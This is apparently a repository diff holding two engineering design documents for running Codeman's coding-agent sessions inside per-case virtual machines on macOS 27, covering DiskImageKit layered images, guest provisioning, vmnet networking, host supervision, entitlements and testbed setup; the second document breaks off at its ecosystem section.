WWDC 2026 session 224 ("Expand the Capabilities of your Virtualization App", https://developer.apple.com/videos/play/wwdc2026/224/) shipped the missing pieces for programmatic, fleet-style VM management on macOS:
|
||||
|
||||
- **`VZMacGuestProvisioningOptions`**: automated first-boot setup of a macOS guest (user account, auto-login, SSH enabled) with zero interactive setup.
|
||||
- **DiskImageKit**: stacked disk images on the Apple Sparse Image Format (ASIF): a read-only base layer plus cheap per-VM cache/overlay layers. Direct analog of Docker image layers + writable container layer.
|
||||
- **vmnet framework**: custom network topologies and port forwarding from the host process.
|
||||
- **`VZCustomVirtioDevice`**: custom low-latency host<->guest channels (Linux guests).
|
||||
- **AccessoryAccess**: USB passthrough (not relevant to Codeman, out of scope).
|
||||
|
||||
Codeman's isolation story today is Docker cases. On macOS, Docker means Docker Desktop / a Linux VM anyway, with weaker fidelity and a heavyweight dependency. The Virtualization framework gives hardware-virtualized per-case sandboxes natively, with a layered-image story that mirrors what `scripts/build-agent-image.mjs` does for Docker. This is the premium native-macOS tier ON TOP of Docker cases, never a replacement (Docker remains the cross-platform story; the Linux prod box cannot use any of this).
|
||||
|
||||
## 2. Platform reality (hard constraints)
|
||||
|
||||
| Constraint | Detail |
|
||||
| ------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Host OS | macOS 27 "Golden Gate" required for the new APIs (dev beta since 2026-06-08, public beta since 2026-07-13, GA expected fall 2026) |
|
||||
| Host hardware | Apple Silicon only (macOS 27 dropped Intel). Testbed: the owner's dedicated MacBook (Section 8); the M4 Mac mini (macOS 26.4, runs the second Codeman install) stays on stable + untouched |
|
||||
| Guest provisioning | `VZMacGuestProvisioningOptions` needs macOS 27 on BOTH host and guest. Linux guests provision via cloud-init instead |
|
||||
| macOS guest concurrency | **Hard kernel cap: 2 concurrent macOS VMs per host. MEASURED on 27 beta 4 (2026-07-29), not inferred**: the 3rd VM is refused instantly with `VZErrorDomain` code 6 while 39% of RAM is free, so more hardware does NOT raise it. Since macOS GUI guests are the headline use case, this is a real product capacity limit to schedule around and surface in the UI. Linux guests are uncapped (resource-bound only) |
|
||||
| Language | Virtualization framework is Swift/ObjC only; Node cannot call it. Requires a Swift helper binary (Key decision 2) |
|
||||
| Entitlement | Host process needs `com.apple.security.virtualization`. Fine for a locally built dev binary; distribution needs signing thought (Section 9) |
|
||||
| Nested virtualization | Linux-guest-only on M3+. A macOS 27 VM cannot dependably host its own guests, so the host-side APIs must be tested on bare-metal 27 (dual-boot) |
|
||||
| CI | Cannot run in CI (needs beta macOS on Apple Silicon). Same answer as tmux/docker: no-op all VM IO under `VITEST`, unit-test the pure parts |
|
||||
|
||||
## 3. Goal and user stories
|
||||
|
||||
Add "VM cases" to Codeman: a case can point at a per-case virtual machine on a macOS host, and any CLI backend runs inside it over the existing remote-SSH session machinery. A LOCATION OVERLAY on cases, exactly like remote-SSH and Docker cases, NEVER a sixth `SessionMode`.
|
||||
|
||||
- As a Mac user, I link a case to a VM so an autonomous run executes behind a hardware virtualization boundary (stronger than Docker's shared kernel) while file viewing, transcripts, and hooks keep working.
|
||||
- Per-case VMs are instant and cheap: a shared provisioned base image plus a per-case overlay, not a full image copy per case.
|
||||
- Killing a session kills only its in-guest tmux; the VM stays up while sibling sessions remain; case delete tears the VM down.
|
||||
- I export a case's VM overlay as a portable artifact (mirror of `docker-exports/`), secrets excluded.
|
||||
- On a non-mac host, or a Mac without the helper, the feature is invisible: zero UI, zero probes, zero errors.
|
||||
|
||||
Non-goals for the MVP: USB passthrough, custom Virtio channels (Phase 3 candidate), macOS-guest fleets (capped at 2 anyway), Kubernetes-style orchestration, Intel Macs.
|
||||
|
||||
## 4. Architecture
|
||||
|
||||
```
|
||||
Codeman (Node, unchanged session layer)
|
||||
| JSON over stdout (same pattern as shelling out to docker/tmux)
|
||||
v
|
||||
codeman-vm (Swift package: CLI + per-VM GUI runner app in the console session)
|
||||
| Virtualization / DiskImageKit / vmnet
|
||||
v
|
||||
per-case VM (macOS or Linux)
|
||||
|-- GUI mode: VZVirtualMachineView in a window --> guest screen sharing --> browser (noVNC)
|
||||
|-- shell: SSH on vmnet IP --> existing remote-SSH tmux machinery
|
||||
^ VirtioFS: host case dir mounted at the SAME absolute path
|
||||
```
|
||||
|
||||
Note the runner is a **GUI app in the console user's session**, not a detached daemon: a daemon-launched VM cannot render, which is fatal for macOS guests and for Linux desktop cases.
|
||||
|
||||
### Key decision 1: location overlay, not a mode
|
||||
|
||||
Identical reasoning to Docker/remote-SSH (see CLAUDE.md): the session layer, respawn, Ralph, recovery, and quick-start plumbing all stay untouched. `SessionMode` stays five-valued. State mirrors the Docker pair: `~/.codeman/vm-hosts.json` + `vm-cases.json`, new `src/vm-hosts.ts` with the storage + pure helpers split.
|
||||
|
||||
### Key decision 2: Swift helper CLI (`codeman-vm`)
|
||||
|
||||
The framework is Swift-only, so all VM work lives in a SwiftPM package (`packages/codeman-vm/`), a CLI with a stable JSON contract:
|
||||
|
||||
- `create-base --guest linux|macos`: build the shared base image. Linux: boot an arm64 cloud image with EFI + cloud-init, install Node 22 + tmux + the four CLIs (same inventory as `docker/agent.Dockerfile`), seal as base ASIF. macOS: IPSW restore + `VZMacGuestProvisioningOptions` (agent user, SSH on), then **desktop-readiness baking**, which is mandatory for GUI guests: suppress the per-user first-login assistant (`com.apple.SetupAssistant` keys + the User Template), enable auto-login (`autoLoginUser` + `/etc/kcpassword`), disable screensaver/lock/display-sleep, and set a static wallpaper (animated "aerials" wallpaper is unusable over remote display). ⚠ Use RAW (not ASIF) for macOS guest disks until the beta's macOS-guest space-reclamation bug is fixed.
|
||||
- `create <case>`: DiskImageKit stacked image: shared read-only base + fresh per-case overlay. Near-instant, space-efficient.
|
||||
- `start <case>` / `stop` / `status` / `ip`: lifecycle + vmnet NAT; `ip` reports the guest SSH endpoint.
|
||||
- `export <case>` / `import`: flatten overlay + workspace tar + manifest, credentials excluded (mirror of docker-export).
|
||||
|
||||
A VM dies with its owning process, so `start` spawns a DETACHED per-VM runner process (analog of the detached `scripts/self-update.sh` trick) rather than a monolithic daemon; `status` talks to it over a unix socket in the instance data dir (`dataPath()`, never a hardcoded `~/.codeman` path).
|
||||
|
||||
### Key decision 3: multi-guest, and GUI is a first-class mode (REVISED 2026-07-29 by the repo owner)
|
||||
|
||||
The subsystem supports both macOS and Linux guests, and a guest runs in one of two **display modes**:
|
||||
|
||||
| | macOS guest | Linux guest |
|
||||
| --- | --- | --- |
|
||||
| **GUI mode** | **the point of the feature**; a real macOS desktop. Mandatory: nothing renders without an attached `VZVirtualMachineView` in an unlocked host session | supported (EFI + virtio-gpu framebuffer) for desktop Linux cases |
|
||||
| **Headless mode** | not offered: a macOS guest with no view renders nothing, so a "headless macOS desktop" is a contradiction. SSH-only macOS is possible but is not what this feature is for | supported and cheap; the natural mode for agent/CI work, driven over SSH |
|
||||
|
||||
Consequences that flow from GUI being first-class:
|
||||
- VM processes are **GUI apps in the console user's session** (LaunchAgent / `launchctl asuser`), never daemons. A daemon-launched VM cannot render.
|
||||
- **The host is part of the product surface**: it must auto-login, never lock, never sleep, and keep a live WindowServer. Host lock == every VM's screen goes black, so the screen lock is effectively a global kill switch for every VM display on the machine. The product must own these host settings rather than treat them as user preference.
|
||||
- **FileVault conflicts with unattended GUI hosting** and the trade-off must be a deliberate choice: FileVault disables auto-login, so a full-disk-encrypted host needs a human at a keyboard (or a remote screen-sharing session) after every reboot before any VM can render. Options are (a) FileVault on, accept manual login per boot, (b) FileVault off on a dedicated VM host so it boots straight into a rendering session, or (c) FileVault on plus a remote-unlock runbook. Codeman should detect the state and tell the user which one they are in instead of silently serving black screens.
|
||||
- **Guests must be desktop-ready, not just booted**: auto-login, no screensaver/lock, and the per-user first-login assistant pre-suppressed at base-image time (`com.apple.SetupAssistant` keys, plus the User Template so later accounts inherit it). Otherwise the user connects to a login prompt or a setup wizard, which is exactly what happened during the first hands-on run.
|
||||
- **Capacity is capped for macOS**: at most 2 concurrent macOS VMs per host, confirmed by our own test on 27 beta 4 (3rd refused with `VZErrorDomain` 6 at 39% free RAM; it is a kernel quota, so bigger hardware does not help). Scheduling must queue or evict beyond 2, the UI must explain why, and the scheduler should tolerate the acknowledged slot-leak bug (a slot occupied with nothing running, host-reboot to clear). Linux guests are uncapped and bounded only by host resources, which is the lever for scaling case counts on one machine.
|
||||
- **Access is via the guest's own screen**, viewable in a browser through the noVNC chain (see `docs/vm-subsystem-apple-stack.md` §8), so no client-version or client-install requirements land on the user.
|
||||
|
||||
Provisioning per guest type: `VZMacGuestProvisioningOptions` for macOS (needs 27-on-27, first-boot-only, and does NOT skip the per-user wizard), cloud-init NoCloud seed ISO for Linux (proven working).
|
||||
|
||||
### Key decision 3b: the GUI VM host profile, and supervision that catches black screens
|
||||
|
||||
GUI hosting only works if the host is configured for it and supervised. This profile was derived the hard way on the testbed (prototyped there 2026-07-30) and should be what `codeman-vm` installs and verifies:
|
||||
|
||||
**Host profile** (the product should own these, not leave them to preference):
|
||||
1. **No login barrier.** Either FileVault off + auto-login (a dedicated VM host boots straight into a rendering session, fully unattended), or FileVault on and remote reboots done with `sudo fdesetup authrestart`, where the pre-boot unlock *is* the login so the machine returns already logged in with encryption intact. **`authrestart` is VERIFIED on the testbed (2026-07-30): the host rebooted remotely and came back with a live logged-in console session, FileVault still enabled, no password prompt** — this is the recommended pattern for an encrypted GUI VM host. Plain reboots on a FileVault host always need a human, so Codeman should detect that combination and warn instead of serving black screens.
|
||||
2. **Never lock**: lock policy off (needs the account password, so it is a setup step, not a scriptable one) plus `caffeinate -d -i -m -u` re-armed per session.
|
||||
3. **Never sleep**: `pmset -a sleep 0 displaysleep 0 disablesleep 1`; a physical display is NOT required (a lid-closed laptop renders fine, only an unlocked session matters). Note OS updates reset these.
|
||||
4. **Session-independent control plane**: run VPN/remote access as a system service, never a session app, and keep the access chain (forwards, VNC proxies, web endpoints) in LaunchDaemons so a session restart cannot sever operator access.
|
||||
|
||||
**Supervision** must be a **root LaunchDaemon**, not a user LaunchAgent. This is the load-bearing detail: a user agent cannot launch a GUI app into the Aqua session, so its restart attempts fail *silently* (the child dies instantly, leaving an empty log while the supervisor cheerfully reports success). A root daemon can, via `launchctl asuser <uid> sudo -u <user> …`, and those launches persist. Prototyped and verified on the testbed 2026-07-30; a working supervisor runs on a short interval and:
|
||||
|
||||
- Restarts the runner when the process is gone **or when its log shows `WindowServer event port death`**, which means it is permanently blind while still looking alive.
|
||||
- Defers restarts while the console is at the login window, and launches into whichever session actually exists (resolve the console user with `stat -f %Su /dev/console`, never a hardcoded one).
|
||||
- Re-points the guest port-forward whenever the guest's NAT lease changes, which happens on **every guest boot** under plain NAT. A vmnet DHCP reservation for a stable per-case IP is the better long-term answer.
|
||||
- **Re-applies host power settings**, because `pmset -a disablesleep 1` does NOT survive a reboot (caught on the supervisor's first run after a real reboot) and OS updates reset it too.
|
||||
- Re-arms the keep-awake helper, which dies with its session.
|
||||
- Ideally also samples the guest framebuffer for non-black content, since a black screen is the one symptom common to every failure mode here.
|
||||
|
||||
`pgrep` alone is worthless for health: every failure mode in this session presented as a healthy process.
|
||||
|
||||
### Key decision 4: sessions ride the existing remote-SSH machinery
|
||||
|
||||
A provisioned guest is literally an SSH host on a vmnet IP. Session launch = the remote-SSH flow with the host swapped in: durable remote `tmux -L codeman-remote`, session names failing `SAFE_MUX_NAME_PATTERN` on purpose, EVERY ssh command line through `buildSshConnectionArgs()` (command-injection invariant), run flows through `POST /api/quick-start` (never `POST /api/sessions`, which stat-validates `workingDir` locally). What is genuinely new is only lifecycle (create/start/stop/export) and the vm-hosts/vm-cases overlay state.
|
||||
|
||||
### Key decision 5: workspace via VirtioFS at the same absolute path
|
||||
|
||||
Mirror the Docker bind-mount invariant: the case workspace is a real host directory shared into the guest via VirtioFS and mounted at the SAME absolute path. That keeps file-routes/watchers on real host bytes and makes the in-guest transcript projHash match the host. Without this, transcripts/attachments/file viewer all silently degrade.
|
||||
|
||||
### Key decision 6: credentials seeded, hooks bridged
|
||||
|
||||
- Credentials are SEEDED (read-only share, copied into the guest once at create), never shared read-write, and excluded from exports: byte-for-byte the Docker cases rule and rationale.
|
||||
- Hooks: on the loopback-only prod bind a guest cannot reach `127.0.0.1:3000`. Mirror `CODEMAN_DOCKER_BRIDGE_HOOKS` with a `CODEMAN_VM_BRIDGE_HOOKS` opt-in listener on the vmnet gateway IP; otherwise idle detection falls back to output-based, same as Docker.
|
||||
|
||||
### Key decision 7: drift and teardown copy Docker semantics verbatim
|
||||
|
||||
Config hash label on the VM (guest type, cpu/mem, share list); a drifted launch is REFUSED, never silently launched stale. One VM per case shared by all sessions; session kill = in-guest tmux kill only; case delete = stop + remove overlay; instance-scoped boot reaper for orphaned runner processes.
|
||||
|
||||
## 5. Implementation phases
|
||||
|
||||
**Phase 0, testbed (no repo code):** dedicated MacBook on the macOS 27 beta, remotely accessible over the tailnet (setup protocol in Section 8), Xcode 27 beta, then a throwaway Swift script proving the loop: create base -> overlay -> boot -> ssh in. This validates 80% of the design before any Codeman code.
|
||||
|
||||
**Phase 1, `codeman-vm` helper:** SwiftPM package, the six subcommands above, JSON contract doc, detached runner + unix-socket status, Linux base image build. Deliverable is testable entirely without Codeman.
|
||||
|
||||
**Phase 2, Codeman integration:** types (`VmHost`/`VmCase`/`SessionVm`), `src/vm-hosts.ts` (+ pure helpers: config hash, arg building, endpoint parsing), Zod schemas, `case-routes` link/unlink + listing, `quick-start` vm branch reusing the remote-SSH launch path, `Session` threading + recovery round-trip, `VITEST` no-op layer, unit tests. Feature-detect: darwin + arm64 + helper binary present, else invisible.
|
||||
|
||||
**Phase 3, polish:** export/import UI, frontend Create Case "VM" tab + case-picker labels, SSE `vm:*` events, macOS-guest opt-in with cap surfaced, custom-Virtio input channel exploration, CLAUDE.md Key Pattern + `docs/vm-cases.md` + COM.
|
||||
|
||||
## 6. Testing
|
||||
|
||||
- Pure helpers unit-tested (ports pattern from `docker-hosts.ts`: 26 tests there, aim similar).
|
||||
- All helper-invoking IO no-ops under `VITEST` (the `IS_TEST_MODE` pattern in `tmux-manager.ts`).
|
||||
- End-to-end verification happens ON the beta MacBook, per the always-end-to-end rule: real base build, real per-case overlay boot, real quick-start into the guest, workspace round-trip through VirtioFS, session-delete keeps VM up, case-delete removes it.
|
||||
- CI never runs the real path; the static guards are type-level + unit-level only.
|
||||
|
||||
## 7. Risks
|
||||
|
||||
1. **Beta API churn**: everything here targets beta SDKs; symbol/behavior changes are likely before fall GA. Mitigation: Phase 0/1 are throwaway-tolerant; no Codeman-side commitment until the helper contract survives a beta cycle.
|
||||
2. **New artifact class**: Codeman ships pure TypeScript today; a Swift binary changes build/distribution (build-on-install via `xcrun swift build` on macs with Xcode CLT? prebuilt signed binary per release?). Needs an owner decision; local dev build is fine for the whole beta period.
|
||||
3. **Entitlement/signing**: `com.apple.security.virtualization` is trivial for local dev, real for distribution.
|
||||
4. **Adoption gating**: users need macOS 27 + Apple Silicon for months after GA. Docker cases remain the default recommendation; VM cases ship dark (feature-detected) with zero cost to everyone else.
|
||||
|
||||
## 8. Beta testbed plan: dedicated MacBook (actionable now)
|
||||
|
||||
Testbed is a dedicated MacBook the owner sacrifices to the beta (after a full backup). This supersedes the earlier dual-boot-the-Mini idea (git history has it): a dedicated machine means no OS-switching, no downtime for the Mini's live Codeman, and no FileVault pre-boot headaches.
|
||||
|
||||
**Sequencing rule that makes it headless: configure ALL remote access on the CURRENT macOS first, THEN upgrade in place.** An in-place beta upgrade preserves Remote Login, Tailscale, user accounts, and auto-login, so there is no Setup Assistant and no post-install physical step. (A fresh install would boot into GUI-only Setup Assistant with no SSH, which on a headless box is a dead end.)
|
||||
|
||||
Confirmed hardware (2026-07-28): MacBook, M3, 16 GB RAM, 256 GB disk with ~100 GB free. Verdict: green. M3 = eligible + nested-virt capable; 16 GB = host + 2-3 concurrent Linux guests (macOS guest = one at a time); 100 GB = fits with discipline: install Xcode 27 beta with the macOS platform only (skipping iOS/watchOS/tvOS simulators saves 15-20 GB), and defer any macOS guest base (~30 GB) to an external SSD or until actually needed. Linux guests + sparse ASIF overlays are the comfortable path.
|
||||
|
||||
### Pre-upgrade checklist (owner, physical, once)
|
||||
|
||||
1. Full backup (Time Machine or clone); the machine should be considered beta-only afterwards.
|
||||
2. Tailscale: install, sign into the tailnet, confirm it appears in `tailscale status` from another node.
|
||||
3. System Settings -> General -> Sharing: **Remote Login ON** (SSH) and **Screen Sharing ON** (for the rare GUI-only moments: Xcode license, Apple Account dialogs).
|
||||
4. **FileVault stays ON** (owner decision 2026-07-28, security over convenience). Consequences: auto-login is unavailable, but FileVault's pre-boot unlock doubles as login, so an unlocked boot still lands in a live GUI session; planned remote reboots go through `sudo fdesetup authrestart` (unlocks for exactly one restart); an UNPLANNED reboot (beta kernel panic, battery drain) parks the machine at the pre-boot screen, no SSH/Tailscale, until the password is typed physically. If the testbed goes silent, suspect this first. Keep it on AC so the battery absorbs power blips.
|
||||
5. Beta enrollment (manual): sign into the Apple Account in System Settings; System Settings -> General -> Software Update -> **Beta Updates** -> select the **macOS 27 Developer Beta** (preferred: framework fixes land weeks earlier than public beta; free since 2023 after accepting the agreement once at developer.apple.com; public-beta alternative: enroll at beta.apple.com). Then run the offered upgrade: plugged in, lid open, trusted network.
|
||||
6. Send over: tailnet name/IP, username, and a first-login password (key install + lockdown happens remotely right after).
|
||||
|
||||
### Post-upgrade setup (remote, over the tailnet)
|
||||
|
||||
1. Verify: `sw_vers` reports 27.x, SSH reachable.
|
||||
2. Server-ize the laptop: `sudo pmset -a sleep 0 disksleep 0 disablesleep 1` (lid-closed operation without an external display), `womp 1` (wake on network), `sudo systemsetup -setrestartpowerfailure on`. Keep on AC power.
|
||||
3. Install the controlling host's SSH key, then disable password auth.
|
||||
4. Xcode 27 beta install (the one step needing the owner's Apple Account sign-in once, doable via Screen Sharing from anywhere); `xcode-select`, license accept, verify `swift --version` + the 27 SDK (`xcrun --show-sdk-version`).
|
||||
5. Phase 0 prototype loop, all remote from here: Linux guest base image (no 27-on-27 provisioning dependency), DiskImageKit overlay, boot, vmnet NAT, ssh into the guest, run `claude --version` inside.
|
||||
6. Only after that loop works: start Phase 1 in `packages/codeman-vm/`.
|
||||
|
||||
## 9. Open decisions (owner)
|
||||
|
||||
1. Linux base distro/image for the default guest (proposal: Ubuntu 24.04 arm64 cloud image, matching the docker agent image's userland).
|
||||
2. Helper distribution for GA: build-on-install vs prebuilt signed binary vs "bring your own Xcode".
|
||||
3. Ship dark behind `CODEMAN_VM_CASES=1` for the first release, or feature-detect only?
|
||||
4. Export format parity with docker-exports (one manifest schema for both?).
|
||||
|
||||
## References
|
||||
|
||||
- Session 224: https://developer.apple.com/videos/play/wwdc2026/224/
|
||||
- Fleet-angle writeup: https://bitrise.io/blog/post/wwdc26-the-virtualization-framework-updates-that-matter-for-large-mac-fleets
|
||||
- Beta timeline: https://www.macworld.com/article/3189014/apple-july-2026-ios-ipados-macos-27-public-betas-tv-arcade-releases.html
|
||||
- Internal analogs: `docs/docker-cases-plan.md` (architecture template), `docs/remote-sessions.md` (session transport), `docs/architecture-invariants.md#docker-cases`
|
||||
@@ -0,0 +1,281 @@
|
||||
<!-- Reference doc for the VM subsystem (Codeman VM cases). Compiled 2026-07-29 from: Apple DocC JSON backend, macOS 27 beta 4 SDK on the testbed, a multi-source web research sweep, and hands-on prototyping on a MacBook Air M3 running macOS 27.0 beta (26A5388g). Companion to vm-cases-plan.md (the Codeman integration plan). -->
|
||||
|
||||
# The VM Subsystem: Apple Virtualization Stack Reference (macOS 27 "Golden Gate")
|
||||
|
||||
"VM subsystem" is the working name for Codeman's native-macOS VM isolation tier and everything under it. This document is the single place for what the Apple stack actually provides, what we have verified ourselves on the beta, and what is known-broken. The Codeman-side design lives in `docs/vm-cases-plan.md`.
|
||||
|
||||
**Research method note:** Apple's HTML doc pages are JS-rendered and come back empty to fetchers. The working route is the DocC JSON backend: `https://developer.apple.com/tutorials/data/documentation/<path>.json` (page content) and `https://developer.apple.com/tutorials/data/index/<framework>` (full symbol tree with per-symbol `beta` flags). Everything below marked "Apple docs" was parsed from that backend directly.
|
||||
|
||||
## 1. Component map and minimum OS versions
|
||||
|
||||
| Component | What it is | Min host OS | Notes |
|
||||
| --- | --- | --- | --- |
|
||||
| Virtualization.framework core | VMs, EFI/Linux boot, virtio devices, VirtioFS | macOS 11-13 era | Unchanged basics; our prototype uses nothing newer than macOS 13 APIs except the DiskImageKit bridge |
|
||||
| **DiskImageKit** | ASIF + raw disk images, layered stacks | **macOS 27** | Swift-only, no ObjC headers. Section 2 |
|
||||
| **Guest provisioning** | First-boot account/SSH setup for macOS guests | **macOS 27 host AND guest** | Mac guests only as of beta 4. Section 3 |
|
||||
| vmnet topology/port-forward/DHCP APIs | Custom networks, port forwarding | **macOS 26** (NOT 27) | 27 adds exactly one fix: loopback port forwarding. Section 4 |
|
||||
| `VZVmnetNetworkDeviceAttachment` | In-process vmnet attach | macOS 26 | |
|
||||
| **`VZCustomVirtioDevice`** family | Custom paravirt devices | **macOS 27** | Linux guests only, custom guest driver required. Section 5 |
|
||||
| AccessoryAccess (USB passthrough) | USB claim + attach to VMs | macOS 27 | Requires paid-team provisioning profile, Dock app. Out of scope for Codeman. Section 6 |
|
||||
|
||||
Corrections to the WWDC-session framing we started with: vmnet's topology family is a macOS 26 story (129 symbols, zero beta-flagged in 27); provisioning does NOT currently extend beyond macOS guests despite the generic-looking `VZGuestProvisioningOptions` base class; DiskImageKit has no attach/mount API at all (it is a file-format library that hands `DiskImage` objects to Virtualization, no `/dev/diskN`, no root needed, no entitlement documented).
|
||||
|
||||
## 2. DiskImageKit (macOS 27, Swift-only)
|
||||
|
||||
Public framework, `/System/Library/Frameworks/DiskImageKit.framework`. No ObjC headers; the API surface lives in the `.swiftinterface`. Verified present in the CLT 27 beta 4 SDK, and our prototype compiled against it with plain `swiftc` on the first attempt.
|
||||
|
||||
### API surface (complete as of beta 4)
|
||||
|
||||
```swift
|
||||
class DiskImage {
|
||||
convenience init(creating: some DiskImage.CreationConfiguration) throws
|
||||
convenience init(opening: some OpenConfigurationProtocol) throws
|
||||
func appending(any DiskImage.CreationConfiguration & DiskImage.StackableLayer) throws -> any StackedImage
|
||||
func appending(consuming DiskImage) throws -> any StackedImage // reattach an existing layer; validates parentUUID
|
||||
func truncate(blockCount: Int) throws // stacked: affects top layer; does NOT resize guest fs
|
||||
var blockCount, blockSize, format, layerType, layerUUID, parentUUID, openMode, size, url
|
||||
}
|
||||
protocol StackedImage: DiskImage { var layers: [DiskImage] }
|
||||
struct OpenConfiguration { init(url:mode:); Mode = automatic | readOnly | readWrite }
|
||||
// CreationConfiguration statics: .asif(url:blockCount:blockSize:), .asifLayer(url:type:), .raw(url:blockCount:)
|
||||
// DiskImage.LayerType: .cache | .overlay | .overlay(blockCount:)
|
||||
// DiskImage.BlockSize: .bytes512 | .bytes4096
|
||||
// Errors: CorruptedImageError, IncompatibleStackingError(reason), InvalidBlockCountError, UnsupportedFormatError
|
||||
```
|
||||
|
||||
Bridge into Virtualization is a new beta convenience init on the existing attachment class. Note there is no `readOnly:` parameter; read-only-ness comes from each layer's own `openMode`:
|
||||
|
||||
```swift
|
||||
VZDiskImageStorageDeviceAttachment(diskImage: stack, cachingMode: .automatic, synchronizationMode: .full)
|
||||
```
|
||||
|
||||
### Stacking rules (Apple docs, verbatim where quoted)
|
||||
|
||||
- ASIF works standalone or stacked. "You can only use RAW images as standalone images or as **base** images in stacked configurations." Upper layers are always ASIF.
|
||||
- **One cache layer per stack**, any number of overlays conceptually, "shallow stacks perform better" (WWDC 224). No published max-depth guidance.
|
||||
- "Layers are processed from bottom (base) to top. The **topmost layer determines the stack's size and receives all writes**." `.overlay(blockCount:)` therefore also grows the virtual disk.
|
||||
- UUID chaining: appending sets the child's `parentUUID` to the parent's `layerUUID`. Raw bases have no UUID. "The layer UUID **changes if the layer is written to**", and reattaching a mismatched layer throws `IncompatibleStackingError`. This is the mechanism that makes a shared read-only base safe.
|
||||
- Base sharing across multiple VMs is the stated design intent ("can be shared across multiple VMs"), with the WWDC caveat that per-VM auxiliary files (EFI variable store, macOS auxiliary storage) must be duplicated per VM, never shared.
|
||||
- **There is no flatten/merge.** An overlay cannot be merged back into its base (confirmed by Howard Oakley's coverage plus an independent hands-on report). Export/move flows must ship the layer chain, or flatten inside a guest (dd to a fresh attached image).
|
||||
|
||||
### Known issues and adoption
|
||||
|
||||
- **ASIF space reclamation is broken for macOS guests on the beta** (deleted files never return space, survives reboots). Linux guests reclaim correctly on both raw and ASIF via `fstrim -av`. Single detailed field report, unrefuted. Since the VM subsystem targets macOS guests, the practical rule until this is fixed is: back macOS guest disks with RAW, and revisit ASIF stacking for macOS guests each beta (stacking still works, the disks just never shrink).
|
||||
- **Zero shipping adopters anywhere.** tart has a design issue with no activity; nobody has published working DiskImageKit code. Everything must be treated as field-untested (and our own testing bears that out, Section 8).
|
||||
- Framework binary grew every beta (588 → 598 across betas 1-4); expect churn until GA.
|
||||
- Release notes list no DiskImageKit known issues in any beta, which given the above says more about the notes than the framework.
|
||||
|
||||
## 3. Guest provisioning (macOS guests only)
|
||||
|
||||
```swift
|
||||
class VZGuestProvisioningOptions: NSObject { func validate() throws } // "use one of its subclasses"
|
||||
class VZMacGuestProvisioningOptions: VZGuestProvisioningOptions {
|
||||
var fullName, username, password: String
|
||||
var logsInAutomatically: Bool
|
||||
var enablesRemoteLogin: Bool // SSH
|
||||
}
|
||||
// Wiring: VZMacOSVirtualMachineStartOptions.guestProvisioningOptions (Mac-typed)
|
||||
// .setGuestProvisioning(_:) throws (validating setter)
|
||||
```
|
||||
|
||||
- **Requires macOS 27 on host AND guest.** Older guests **silently ignore** the options (no error).
|
||||
- **First boot after restore only.** Cannot reconfigure an already-provisioned VM; property changes after start are no-ops.
|
||||
- The base class is forward-looking scaffolding; its only subclass is Mac. A Linux/cloud-init analogue may come later; do not assume it lands in 27.0. For Linux guests, cloud-init NoCloud seed ISOs remain the provisioning path (proven working, Section 8).
|
||||
- Field-verified behavior (third-party hands-on, beta 3): provisioned account gets full admin + sudo; Setup Assistant fully skipped; SSH reachable ~48 s after first boot. **Race**: the account is created late in first boot (~T+54 s), after LaunchDaemons start (~T+33 s), so anything at daemon-level must wait for the account to exist.
|
||||
- Open Apple-acknowledged bug: provisioned users are invisible to `CSIdentityQueryExecute()` (FB23716201).
|
||||
- IPSW acquisition gotcha for automation: `VZMacOSRestoreImage.latestSupported` tracks the latest *release* (returned 26.5.2), not the installed beta; beta IPSWs must be fetched from the seed CDN explicitly.
|
||||
|
||||
## 4. vmnet: a macOS 26 feature set, one macOS 27 fix
|
||||
|
||||
Everything interesting shipped in macOS 26: `vmnet_network_create`, `vmnet_network_configuration_create`, `..._add_port_forwarding_rule`, `..._add_dhcp_reservation`, subnet/prefix/MTU/external-interface setters, NAT44/NAT66/DHCP/DNS-proxy/RA disables, plus serialization (`vmnet_network_copy_serialization` / `_create_with_serialization`) for handing networks across processes. `VZVmnetNetworkDeviceAttachment` is macOS 26.
|
||||
|
||||
macOS 27's only change (beta 4 release notes, verbatim): "The vmnet port forwarding APIs now support port forwarding when communicating over loopback." That closes the old gap where the host could not reach its own forwarded ports via 127.0.0.1 (confirmed working by the original bug reporter). Directly relevant to Codeman's loopback-bound production server talking to per-case guests.
|
||||
|
||||
Gotchas:
|
||||
- vmnet networks are **not persisted**; they die with the owning process. Persist settings yourself and recreate (or serialize across processes).
|
||||
- The `com.apple.vm.networking` entitlement is still restricted ("contact your Apple representative", though DTS says most requests are approved). The plain `VZNATNetworkDeviceAttachment` needs no special entitlement and is what our prototype uses.
|
||||
- Ecosystem signal: tart's maintainer is not adopting in-process vmnet (prefers their separate-process softnet), so field testing of these APIs is thin.
|
||||
|
||||
## 5. VZCustomVirtioDevice (macOS 27, Linux guests only)
|
||||
|
||||
14 new types (`VZCustomVirtioDevice(+Configuration/Delegate/Provider)`, `VZVirtioQueue(+Element)`, `VZVirtioFeatureSet`, shared-memory-region types, `VZGuestMemoryMapping`), wired via `VZVirtualMachineConfiguration.customVirtioDevices`. Mandatory for guest discovery: `deviceID`, `pciClassID`, `pciSubclassID`, `virtioQueueCount`. You must write the Linux guest driver (Virtio spec 1.3/1.4). Threading contract: the framework calls the device/delegate on a serial queue (`deviceQueue`, defaulting to the VM's queue). Zero public adopters. For the VM subsystem this is a Phase 3+ option for a low-latency host-guest channel; SSH over NAT is proven and sufficient for now.
|
||||
|
||||
## 6. Signing and entitlements
|
||||
|
||||
- **Core loop (VZ + DiskImageKit + provisioning): ad-hoc signing with only `com.apple.security.virtualization` suffices.** Verified by us on beta 4 (plain `codesign --entitlements ... -s -` on a `swiftc` binary) and independently by third parties on beta 3. DiskImageKit documents no entitlement at all.
|
||||
- **Over-entitling is the actual trap.** Adding `com.apple.application-identifier`/team-identifier keys without an embedded provisioning profile hangs the process before `main` (watchdog kill); shipping `com.apple.vm.networking` unauthorized gets AMFI SIGKILL at exec (exit 137, no crash report, even for `--version`). Keep the entitlements plist to exactly the one key.
|
||||
- **USB passthrough breaks the ad-hoc story**: `com.apple.developer.accessory-access.usb` is profile-restricted (any paid team, no ad-hoc), additionally requires `com.apple.security.device.usb`, and `AAUSBAccessoryManager` presents UI, so it wants a Dock app, not a headless CLI. Out of scope for Codeman.
|
||||
- No Xcode required for any of the above: the CLT beta (~500 MB via `softwareupdate`) carries the full macOS 27 SDK including DiskImageKit and compiles/signs everything.
|
||||
|
||||
## 7. Ecosystem state (July 2026)
|
||||
|
||||
